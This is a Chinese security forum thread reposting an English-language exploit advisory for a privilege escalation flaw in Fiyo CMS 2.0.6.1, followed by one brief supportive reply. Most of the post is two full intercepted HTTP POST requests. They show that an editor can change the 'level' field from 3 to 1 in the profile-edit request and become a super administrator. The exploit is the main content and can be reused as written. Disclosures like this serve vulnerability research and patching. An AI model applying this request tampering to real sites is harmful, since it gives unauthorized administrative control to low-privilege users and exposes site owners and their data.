请选择 进入手机版 | 继续访问电脑版
查看: 883|回复: 1

Fiyo CMS 2.0.6.1 权限提升漏洞

[复制链接]
  • TA的每日心情

    3 天前
  • 签到天数: 790 天

    [LV.10]以坛为家III

    发表于 2017-3-13 20:27:00 | 显示全部楼层 |阅读模式
    [PHP] 纯文本查看 复制代码
    # Exploit Title: Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1
    # Google Dork: no
    # Date: 11-03-2017
    # Exploit Author: @rungga_reksya, @dvnrcy
    # Vendor Homepage: [url]http://www.fiyo.org[/url]
    # Software Link: [url]https://sourceforge.net/projects/fiyo-cms[/url]
    # Version: 2.0.6.1
    # Tested on: Windows Server 2012 Datacenter Evaluation
    # CVE : no
      
    I. Background (Bahasa/Indonesian Language):
    Fiyo CMS dikembangkan dan dibuat pertama kali oleh mantan seorang pelajar SMK yang pada saat itu bersekolah di SMK 10 Semarang jurusan RPL. Pada zaman itu namanya bukan Fiyo CMS melainkan Sirion yang merupakan akronim dari Site Administration.
      
    II. Description:
    Privilege Escalation (Manipulation of User Group) Vulnerability on Fiyo CMS 2.0.6.1
      
    III. Exploit:
    Fiyo CMS have five user group (super administrator, administrator, editor, publisher, member) and only three group can access backend page of admin (super administrator, administrator and editor).
      
    If we login as super administrator and access edit profile menu, check source code (ctrl+u) from your browser and we get level privilege:
    super administrator = 1
    administrator = 2
    editor = 3
    publisher = 4
    member = 5
      
    Ok, prepare your tool like burpsuite to intercept traffic. in this case I login as editor and I want manipulation of editor group (level=3) to be super administrator group (level=1).A  The first you access on menu aEdit Profilea and click aSimpan (Save)a, and then change like this on your burpsuite intercept menu:
      
    Original:
      
    POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1
    Host: 192.168.1.2
    User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: [url]http://192.168.1.2/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3[/url]
    Cookie: c40cded1c770e0ead20a6bcbf9a26edf=hplreme8us3iem3jg36km36ob5; PHPSESSID=dcj4n83jd2tdrjs32fo6gm9eq7
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 134
      
    edit=Next&id=3&z=editor&user=editor&z=editor&x=&password=editor&kpassword=editor&email=editor%40localhost.com&level=3&name=editor&bio=
      
      
    Manipulation (Change Level=3 to be Level=1):
      
    POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1
    Host: 192.168.1.2
    User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: [url]http://192.168.1.2/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3[/url]
    Cookie: c40cded1c770e0ead20a6bcbf9a26edf=hplreme8us3iem3jg36km36ob5; PHPSESSID=dcj4n83jd2tdrjs32fo6gm9eq7
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 134
      
    edit=Next&id=3&z=editor&user=editor&z=editor&x=&password=editor&kpassword=editor&email=editor%40localhost.com&level=1&name=editor&bio=
      
    Yeaaah, now editor become super administrator privilege and The level of administrator can be super administrator too ^_^
      
      
    IV. Thanks to:
    - Alloh SWT
    - MyBoboboy
    - MII CAS
    - Komunitas IT Auditor & IT Security Kaskus
    回复

    使用道具 举报

  • TA的每日心情
    开心
    2018-8-26 13:46
  • 签到天数: 426 天

    [LV.9]以坛为家II

    发表于 2017-3-15 20:53:36 | 显示全部楼层
    不错 支持下
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    快速回复 返回顶部 返回列表